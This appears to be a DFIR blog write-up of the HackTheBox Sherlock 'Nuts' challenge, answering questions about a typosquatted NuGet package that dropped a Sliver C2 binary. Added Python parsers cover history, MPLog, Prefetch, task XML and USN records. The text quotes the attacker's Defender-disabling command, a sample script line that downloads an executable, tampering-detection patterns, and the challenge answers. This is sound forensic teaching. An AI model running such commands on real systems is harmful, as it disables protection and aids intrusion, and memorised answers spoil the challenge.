HackTheBox Sherlock : Nuts

Write-Up

أحمد ناصر
7 min read · Nov 4, 2024

Hello Forensics Geeks, this is Ahmed Nasser, known as oxAlpha, and here is a simple write-up of the Nuts challenge from HTB.

Don't forget us in your prayers.

My LinkedIn

Q1-What action did Alex take to integrate the purported time-saving package into the deployment process? (provide the full command)

  • The first thing that came to my mind was to check the PowerShell logs and the PSReadLine “ConsoleHost_history” file.
PSReadLine location:
Nuts\C\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
The Answer : nuget install PublishIgnor -Version 1.0.11-beta

Q2-Identify the URL from which the package was downloaded.

  • Since the question asks about a URL, the first thing that came to my mind was to check the browser history:
Chrome history location:
Nuts\C\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default
  • Then open the History file using DB Browser and go to Browse Data > urls:
The Answer : https://www.nuget.org/packages/PublishIgnor/

Q3-Who is the threat actor responsible for publishing the malicious package? (the name of the package publisher)

  • Easy, just open the package URL from Q2:
The Answer : a1l4m

Q4-When did the attacker initiate the download of the package? Provide the timestamp in UTC format (YYYY-MM-DD HH:MM).

  • Now let’s parse the $MFT file using a tool like MFTECmd.exe:
  • Then open the CSV file using a tool like Timeline Explorer:
The answer : 2024-03-19 18:41

Q5-Despite restrictions, the attacker successfully uploaded the malicious file to the official site by altering one key detail. What is the modified package ID of the malicious package?

  • From Q1 and Q2 we saw that the attacker managed to upload the malicious package “PublishIgnor” to the NuGet site by using a typosquatting technique:
Real package name : PublishIgnore
Modified package name : PublishIgnor
The answer : PublishIgnor

Q6-Which deceptive technique did the attacker employ during the initial access phase to manipulate user perception? (technique name)

  • From Q5 we know that the attacker used the typosquatting technique.
The Answer : typosquatting

Q7-Determine the full path of the file within the package containing the malicious code.

  • Again, from the output of MFTECmd.exe:
  • Now go to the PowerShell script’s location and open it to see what’s going on:
C\Users\Administrator\.nuget\packages\publishignor\1.0.11-beta\tools
The Answer : C:\Users\Administrator\.nuget\packages\publishignor\1.0.11-beta\tools\init.ps1

Q8-When tampering with the system’s security settings, what command did the attacker employ?

  • From the malicious script above, we can see that the attacker tampered with the system’s security settings using this command:
Set-MpPreference -DisableRealtimeMonitoring $true
The Answer : Set-MpPreference -DisableRealtimeMonitoring $true
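The PSReadLine history from Q1 and the package’s init.ps1 from Q7 and Q8 are both plain PowerShell text, so one scanner can pull the install command out of the first, flag the Defender-tampering cmdlet in the second, and score the installed package id against an allow-list to surface the one-character near-miss behind Q5 and Q6. The Python below is an added example written for this write-up, not code from the challenge or its author; the history lines, the init.ps1 lines and the KNOWN_PACKAGES allow-list are constructed sample data.

```python
import re

# Constructed sample text in the style of a PSReadLine ConsoleHost_history.txt
# and of a NuGet package's tools\init.ps1; neither is taken from the challenge image.
HISTORY_SAMPLE = """\
cd C:\\deploy
nuget install PublishIgnor -Version 1.0.11-beta
Get-ChildItem
"""

INIT_PS1_SAMPLE = """\
param($installPath, $toolsPath, $package, $project)
Set-MpPreference -DisableRealtimeMonitoring $true
Invoke-WebRequest -Uri http://example.invalid/uninstall.exe -OutFile C:\\ProgramData\\uninstall.exe
"""

# Package ids the deployment is expected to use (assumed allow-list for this example).
KNOWN_PACKAGES = {"PublishIgnore", "Newtonsoft.Json"}

# "nuget install <id> [-Version <v>]" as typed at the console.
INSTALL_RE = re.compile(r"nuget\s+install\s+(\S+)(?:\s+-Version\s+(\S+))?", re.IGNORECASE)

# Defender preference changes that weaken protection: disabling a feature or adding an exclusion.
TAMPER_RE = re.compile(r"\b(?:Set|Add)-MpPreference\s+-(?:Disable\w+|Exclusion\w+)", re.IGNORECASE)


def levenshtein(a, b):
    """Edit distance between two strings (row-by-row dynamic programming)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def find_installs(text):
    """Return (package_id, version_or_None) for every nuget install command in the text."""
    return [(m.group(1), m.group(2)) for m in INSTALL_RE.finditer(text)]


def typosquat_candidates(package_id, known, max_distance=2):
    """Known ids within max_distance edits of package_id, nearest first.

    NuGet ids are case-insensitive, so a case-insensitive exact match is a normal
    install, not a typosquat, and yields no candidates.
    """
    wanted = package_id.lower()
    if any(k.lower() == wanted for k in known):
        return []
    hits = [(k, levenshtein(wanted, k.lower())) for k in known]
    return sorted(((k, d) for k, d in hits if d <= max_distance), key=lambda h: (h[1], h[0]))


def find_tampering(text):
    """Lines that change Defender preferences, stripped of surrounding whitespace."""
    return [line.strip() for line in text.splitlines() if TAMPER_RE.search(line)]


if __name__ == "__main__":
    for pkg, ver in find_installs(HISTORY_SAMPLE):
        print(f"install of {pkg} {ver or ''}: near-miss of {typosquat_candidates(pkg, KNOWN_PACKAGES)}")
    for line in find_tampering(INIT_PS1_SAMPLE):
        print("Defender tampering:", line)
```

A package id that is one edit away from an allow-listed name but not equal to it is exactly the typosquatting signature from Q5; the comparison lowercases both sides because NuGet treats ids case-insensitively. The tampering regex only reports lines for review, which is what you want when triaging history and package scripts after the fact.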

Q9-Following the security settings alteration, the attacker downloaded a malicious file to ensure continued access to the system. Provide the SHA1 hash of this file.

  • From Q7 we know that the attacker downloaded a malicious file named “uninstall.exe” using the malicious PowerShell script.
  • Now it’s time to look at the Windows Defender logs:
Windows Defender logs :
C\Windows\System32\winevt\logs\Microsoft-Windows-Windows Defender%4Operational
  • Now filter on Event IDs 1116 and 1117:
  • From the above, we see that Windows Defender found the malicious file, but the event log does not provide the file hash.
  • So after some searching I found that Windows Defender saves scan results in a text file named MPLog:
MPLog location :
C\ProgramData\Microsoft\Windows Defender\Support
The Answer : 57b7acf278968eaa53920603c62afd8b305f98bb

Q10-Identify the framework utilised by the malicious file for command and control communication.

  • From the Windows Defender logs:
VirTool:Win32/Sliver.D!MTB
  • As you can see, the malicious file is using the Sliver framework as its C2.
The Answer : Sliver
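Q9 and Q10 both come out of Defender’s own text logs: the Operational event log (IDs 1116 and 1117) names the threat and the path but not the hash, while MPLog carries the hash, and the detection name itself follows Microsoft’s Type:Platform/Family.Variant!Suffix convention, whose Family component is where “Sliver” comes from. The Python below is an added example, not code from the write-up or from Microsoft; the MPLog lines are constructed to imitate that kind of entry (the real layout varies between Defender builds, so the regexes are deliberately loose), and the SHA1 in them is the one quoted in this write-up.

```python
import re
from collections import OrderedDict

# Constructed lines that imitate the detection and resource entries found in
# MPLog-*.log. The real layout differs between Defender builds, so the regexes
# are deliberately loose: they pull a threat name, a Windows path and a
# 40-hex-digit SHA1 from wherever they sit on a line.
MPLOG_SAMPLE = r"""
2024-03-19T19:33:32.000Z DETECTION_ADD#2 VirTool:Win32/Sliver.D!MTB file:C:\ProgramData\uninstall.exe
2024-03-19T19:33:32.010Z Resource file:C:\ProgramData\uninstall.exe sha1=57b7acf278968eaa53920603c62afd8b305f98bb
2024-03-19T19:40:00.000Z Scan of C:\Users\Administrator\Documents\notes.txt completed, no threat
"""

# Microsoft's detection naming convention: Type:Platform/Family.Variant!Suffix
THREAT_RE = re.compile(
    r"\b([A-Za-z]+):([A-Za-z0-9]+)/([A-Za-z0-9_]+)(?:\.([A-Za-z0-9]+))?(?:!([A-Za-z0-9]+))?")
PATH_RE = re.compile(r"[A-Za-z]:\\[^\s\"',]+")
SHA1_RE = re.compile(r"\b[0-9a-fA-F]{40}\b")
TS_RE = re.compile(r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}")


def parse_threat_name(name):
    """Split a Defender detection name into its documented components, or None if malformed."""
    m = THREAT_RE.fullmatch(name)
    if not m:
        return None
    typ, platform, family, variant, suffix = m.groups()
    return {"type": typ, "platform": platform, "family": family,
            "variant": variant, "suffix": suffix}


def extract_detections(log_text):
    """One record per file path that was named in a detection: threat, SHA1, first timestamp."""
    records = OrderedDict()
    for line in log_text.splitlines():
        path = PATH_RE.search(line)
        if not path:
            continue
        rec = records.setdefault(path.group(0), {"path": path.group(0), "threat": None,
                                                 "sha1": None, "first_seen": None})
        ts = TS_RE.match(line)
        if ts and rec["first_seen"] is None:
            rec["first_seen"] = ts.group(0).replace("T", " ")   # 'YYYY-MM-DD HH:MM:SS', UTC as logged
        threat = THREAT_RE.search(line)
        if threat and rec["threat"] is None:
            rec["threat"] = threat.group(0)
        sha1 = SHA1_RE.search(line)
        if sha1 and rec["sha1"] is None:
            rec["sha1"] = sha1.group(0).lower()
    # Paths that were only scanned, never flagged, carry no threat name and are dropped.
    return [r for r in records.values() if r["threat"]]


def c2_family(record):
    """Family component of the record's threat name (e.g. 'Sliver'), which names the C2 framework here."""
    parsed = parse_threat_name(record["threat"])
    return parsed["family"] if parsed else None


if __name__ == "__main__":
    for rec in extract_detections(MPLOG_SAMPLE):
        print(rec["first_seen"], rec["path"], rec["threat"], rec["sha1"], "family:", c2_family(rec))
```

Keying the records by path is what lets a hash that appears on a later line be joined to the detection line that named the file; on a real MPLog, run it over the whole Support folder, since Defender rotates the log. The `!MTB` suffix marks a machine-learning (behavioural) signature, so the family name is the reliable part of the string and the variant letter is not.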

Q11-At what precise moment was the malicious file executed?

  • Now the question asks about the execution time of the “Uninstall.exe” file.
  • First I started parsing Amcache using a tool like AmcacheParser, but found nothing.
Amcache location :
C\Windows\AppCompat\Programs
  • So I started parsing the Prefetch files using a tool like PECmd.exe:
The Answer : 2024-03-19 19:23:36

Q12-The attacker made a mistake and didn’t stop all the features of the security measures on the machine. When was the malicious file detected? Provide the timestamp in UTC.

  • Back again to the Windows Defender log, we can see that Defender detected the malicious file “uninstaller.exe”:
The Answer : 2024-03-19 19:33:32

Q13-After establishing a connection with the C2 server, what was the first action taken by the attacker to enumerate the environment? Provide the name of the process.

  • Back again to the Prefetch files: we know that the malicious file “Uninstaller.exe” was executed at 2024-03-19 19:23:36.
  • Therefore, we can narrow the time range:
The Answer : Whoami.exe
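Q4, Q11 and Q13 all come down to the same move: load the MFTECmd and PECmd CSV output, put every timestamp on one UTC axis, and read what happened in the minutes after a pivot such as the first execution of the dropped binary. The Python below is an added example, not the tools’ own code or anything from the write-up; the two CSV texts use a subset of the real MFTECmd ($MFT) and PECmd column names with constructed rows, and the 15-minute window is an arbitrary choice for the demonstration.

```python
import csv
import io
from collections import namedtuple
from datetime import datetime, timedelta, timezone

Event = namedtuple("Event", "when source name detail")

# Constructed rows using a subset of MFTECmd's $MFT CSV columns (sample data, not
# the challenge's real timeline).
MFT_CSV = r"""ParentPath,FileName,Created0x10,LastModified0x10
.\Users\Administrator\.nuget\packages\publishignor\1.0.11-beta\tools,init.ps1,2024-03-19 18:41:12.0000000,2024-03-19 18:41:12.0000000
.\ProgramData,uninstall.exe,2024-03-19 19:22:50.0000000,2024-03-19 19:22:50.0000000
.\ProgramData,File.exe,2024-03-19 19:30:04.0000000,2024-03-19 19:30:04.0000000
"""

# Constructed rows using a subset of PECmd's Prefetch CSV columns; PreviousRun0
# is the first of the up-to-seven earlier run times a Prefetch file keeps.
PREFETCH_CSV = r"""ExecutableName,RunCount,LastRun,PreviousRun0
UNINSTALL.EXE,1,2024-03-19 19:23:36.0000000,
WHOAMI.EXE,1,2024-03-19 19:23:51.0000000,
CMD.EXE,2,2024-03-19 19:25:10.0000000,2024-03-18 10:00:00.0000000
"""


def parse_ts(s):
    """Parse 'YYYY-MM-DD HH:MM:SS[.fffffff]' as UTC (both tools emit UTC by default);
    strptime only takes six fractional digits, so the seventh is dropped."""
    s = s.strip()
    if "." in s:
        head, frac = s.split(".", 1)
        s = f"{head}.{(frac + '000000')[:6]}"
        fmt = "%Y-%m-%d %H:%M:%S.%f"
    else:
        fmt = "%Y-%m-%d %H:%M:%S"
    return datetime.strptime(s, fmt).replace(tzinfo=timezone.utc)


def load_mft(csv_text):
    """One 'created' event per $MFT row, from the $STANDARD_INFORMATION creation time."""
    events = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        full = row["ParentPath"].lstrip(".") + "\\" + row["FileName"]
        events.append(Event(parse_ts(row["Created0x10"]), "mft", row["FileName"], "created " + full))
    return events


def load_prefetch(csv_text):
    """One 'run' event per recorded execution time in each Prefetch row."""
    events = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        for col in ("LastRun", "PreviousRun0"):
            if row[col]:
                events.append(Event(parse_ts(row[col]), "prefetch", row["ExecutableName"],
                                    f"run (RunCount={row['RunCount']})"))
    return events


def build_timeline(mft_csv, prefetch_csv):
    """All events from both sources, oldest first."""
    return sorted(load_mft(mft_csv) + load_prefetch(prefetch_csv), key=lambda e: e.when)


def window(events, pivot, minutes):
    """Events from the pivot up to pivot+minutes, inclusive, in time order."""
    end = pivot + timedelta(minutes=minutes)
    return [e for e in sorted(events, key=lambda e: e.when) if pivot <= e.when <= end]


def first_process_after(events, pivot, exclude):
    """Name of the first Prefetch-recorded execution strictly after the pivot, skipping `exclude`."""
    for e in sorted(events, key=lambda e: e.when):
        if e.source == "prefetch" and e.when > pivot and e.name.lower() != exclude.lower():
            return e.name
    return None


if __name__ == "__main__":
    pivot = parse_ts("2024-03-19 19:23:36")
    for e in window(build_timeline(MFT_CSV, PREFETCH_CSV), pivot, 15):
        print(e.when.strftime("%Y-%m-%d %H:%M:%S"), e.source, e.name, e.detail)
```

Two caveats the write-up’s tooling hides: a Prefetch file only retains the last eight run times, so an executable run more often than that loses its earliest executions, and Prefetch is disabled on some server SKUs and SSD-tuned builds, in which case Amcache and the event logs have to carry the execution question instead.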

Q14-To ensure continued access to the compromised machine, the attacker created a scheduled task. What is the name of the created task?

  • Now let’s check the scheduled tasks in:
C\Windows\System32\Tasks
  • As shown, the attacker created a scheduled task to tamper with the system’s security.
The Answer : MicrosoftSystemDailyUpdates

Q15-When was the scheduled task created? Provide the timestamp in UTC.

  • From the image above we can see when the task was created:
The Answer : 2024-03-19 19:24:05
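Each file under C:\Windows\System32\Tasks is an XML document in the Task Scheduler schema, so the registration date behind Q15 and the action behind Q14 can be read straight from the file rather than from a screenshot. The Python below is an added example, not the challenge’s task files: the task name is the one from the write-up, but the XML bodies (dates, author, trigger and command line) are constructed sample data, and the tampering pattern is an assumption of what a Defender-disabling action looks like.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import Path

# Task Scheduler XML namespace used by every file under C:\Windows\System32\Tasks.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Task files are UTF-16 with a BOM; the constructed samples below are encoded the
# same way. The XML bodies are sample data, not the challenge's real task.
SUSPICIOUS_TASK = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2024-03-19T19:24:05</Date>
    <Author>WORKSTATION\\Administrator</Author>
  </RegistrationInfo>
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2024-03-19T19:24:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-NoProfile -Command Set-MpPreference -DisableRealtimeMonitoring $true</Arguments>
    </Exec>
  </Actions>
</Task>""".encode("utf-16")

BENIGN_TASK = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Date>2024-01-10T08:00:00</Date><Author>WORKSTATION\\Administrator</Author></RegistrationInfo>
  <Actions Context="Author"><Exec><Command>C:\\Tools\\backup.exe</Command><Arguments>--nightly</Arguments></Exec></Actions>
</Task>""".encode("utf-16")

# Assumed indicator: an action that disables a Defender feature or adds an exclusion.
TAMPER_RE = re.compile(r"(?:Set|Add)-MpPreference\s+-(?:Disable\w+|Exclusion\w+)", re.IGNORECASE)
DECL_RE = re.compile(r"^\s*<\?xml[^>]*\?>")


def load_task_xml(raw):
    """Decode a task file (UTF-16 with BOM, else UTF-8) and parse it. The XML declaration is
    dropped first so ElementTree is not asked to honour encoding="UTF-16" on decoded text."""
    text = raw.decode("utf-16") if raw[:2] in (b"\xff\xfe", b"\xfe\xff") else raw.decode("utf-8")
    return ET.fromstring(DECL_RE.sub("", text, count=1).lstrip())


def summarize_task(name, raw):
    """Registration date, author, trigger kinds, command lines and a tampering flag for one task."""
    root = load_task_xml(raw)

    def field(xpath):
        return (root.findtext(xpath, namespaces=NS) or "").strip()

    actions = []
    for exe in root.findall("t:Actions/t:Exec", NS):
        cmd = (exe.findtext("t:Command", default="", namespaces=NS) or "").strip()
        args = (exe.findtext("t:Arguments", default="", namespaces=NS) or "").strip()
        actions.append((cmd + " " + args).strip())
    return {
        "name": name,
        "registered": field("t:RegistrationInfo/t:Date"),
        "author": field("t:RegistrationInfo/t:Author"),
        "triggers": [t.tag.split("}")[1] for t in root.findall("t:Triggers/*", NS)],
        "actions": actions,
        "tampers_with_defender": any(TAMPER_RE.search(a) for a in actions),
    }


def scan_tasks_dir(tasks_root):
    """Summarize every file below a Tasks folder; the task name is its path relative to that folder."""
    root = Path(tasks_root)
    return [summarize_task(str(p.relative_to(root)), p.read_bytes())
            for p in sorted(root.rglob("*")) if p.is_file()]


if __name__ == "__main__":
    for name, raw in (("MicrosoftSystemDailyUpdates", SUSPICIOUS_TASK), ("NightlyBackup", BENIGN_TASK)):
        print(summarize_task(name, raw))
```

RegistrationInfo/Date is written without a zone designator, so it has to be read against the host’s configured time zone before it is reported as UTC; the same registration is mirrored in the Schedule\TaskCache keys of the SOFTWARE hive, which is the place to cross-check if the XML file itself has been removed.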

Q16-Upon concluding the intrusion, the attacker left behind a specific file on the compromised host. What is the name of this file?

  • First I tried to find anything useful in $MFT but found nothing.
  • So I tried to parse $LogFile using a tool like NTFS Log Tracker:
  • Then open the CSV file and filter on 2024-03-19 (the date the malicious file was executed):
The Answer : File.exe

Q17-As an anti-forensics measure. The threat actor changed the file name after executing it. What is the new file name?

  • Now let’s parse the $J file:
C\$Extend\$J
  • Now search for the file name “File.exe”:
The Answer : Updater.exe
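Q16 and Q17 hinge on the fact that $MFT only ever holds a file’s current name, while the USN journal ($Extend\$J) records every rename as a RenameOldName record followed by a RenameNewName record for the same MFT entry. The Python below is an added example, not code from the write-up or from MFTECmd: it pairs those records from MFTECmd-style $J CSV rows (a subset of the real columns, constructed sample data, with a second rename added so the chain-following is visible) and walks the chain in both directions.

```python
import csv
import io
from collections import namedtuple

Rename = namedtuple("Rename", "key old new parent when")

# Constructed rows using a subset of MFTECmd's $J CSV columns. UpdateReasons
# carries the USN reason flags joined with '|'. Sample data for this example;
# the second rename (to SysUpdater.exe) is invented to show a longer chain.
# Timestamps are kept as strings: the fixed-width format sorts correctly as text.
USN_CSV = r"""Name,EntryNumber,SequenceNumber,ParentPath,UpdateTimestamp,UpdateReasons
File.exe,9001,3,.\ProgramData,2024-03-19 19:30:04.0000000,FileCreate
File.exe,9001,3,.\ProgramData,2024-03-19 19:30:05.0000000,DataExtend|FileCreate|Close
File.exe,9001,3,.\ProgramData,2024-03-19 19:31:40.0000000,RenameOldName
Updater.exe,9001,3,.\ProgramData,2024-03-19 19:31:40.0000000,RenameNewName
Updater.exe,9001,3,.\ProgramData,2024-03-19 19:31:40.0000000,RenameNewName|Close
notes.txt,9002,1,.\Users\Administrator\Documents,2024-03-19 19:32:00.0000000,FileCreate|Close
Updater.exe,9001,3,.\ProgramData,2024-03-19 19:45:12.0000000,RenameOldName
SysUpdater.exe,9001,3,.\ProgramData,2024-03-19 19:45:12.0000000,RenameNewName|Close
"""


def rename_events(csv_text):
    """Pair each RenameOldName record with the next RenameNewName for the same MFT entry.

    The (EntryNumber, SequenceNumber) pair identifies the file, so two files that
    happen to share a name are never mixed up. A trailing 'RenameNewName|Close'
    record for an already-paired rename is ignored.
    """
    pending = {}
    events = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        key = (row["EntryNumber"], row["SequenceNumber"])
        reasons = set(row["UpdateReasons"].split("|"))
        if "RenameOldName" in reasons:
            pending[key] = row["Name"]
        elif "RenameNewName" in reasons and key in pending:
            events.append(Rename(key, pending.pop(key), row["Name"],
                                 row["ParentPath"], row["UpdateTimestamp"]))
    return events


def trace_name(events, start):
    """Follow renames forward from `start` to the name the file carried last."""
    chain = [start]
    key = None
    for ev in sorted(events, key=lambda e: e.when):
        if key is None and ev.old == start:
            key = ev.key
        if key is not None and ev.key == key and ev.old == chain[-1]:
            chain.append(ev.new)
    return chain


def trace_back(events, end):
    """Walk renames backwards from `end` to the name the file was created with."""
    chain = [end]
    key = None
    for ev in sorted(events, key=lambda e: e.when, reverse=True):
        if key is None and ev.new == end:
            key = ev.key
        if key is not None and ev.key == key and ev.new == chain[0]:
            chain.insert(0, ev.old)
    return chain


if __name__ == "__main__":
    evs = rename_events(USN_CSV)
    for ev in evs:
        print(ev.when, ev.parent, ev.old, "->", ev.new)
    print("forward:", " -> ".join(trace_name(evs, "File.exe")))
    print("backward:", " -> ".join(trace_back(evs, "SysUpdater.exe")))
```

The journal is a ring buffer, so on a busy volume the rename records can age out long before the $MFT entry does; when they have, the $LogFile route the write-up used for Q16 and the file’s $FILE_NAME timestamps in $MFT are what remain.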

Q18-Identify the malware family associated with the file mentioned in the previous question (17).

  • First let’s calculate the file hash:
  • From $MFT, we know that “Updater.exe” is under the ProgramData folder:
MD5: E22B106252ECF59210262C67E1A8877B
The Answer : Impala

Q19-When was the file dropped onto the system? Provide the timestamp in UTC.

  • Back again to the $MFT file:
The Answer : 2024-03-19 19:30:04

The End

Follow for more 😁


Written by أحمد ناصر

CyberSecurity Analyst || DFIR || CTF player
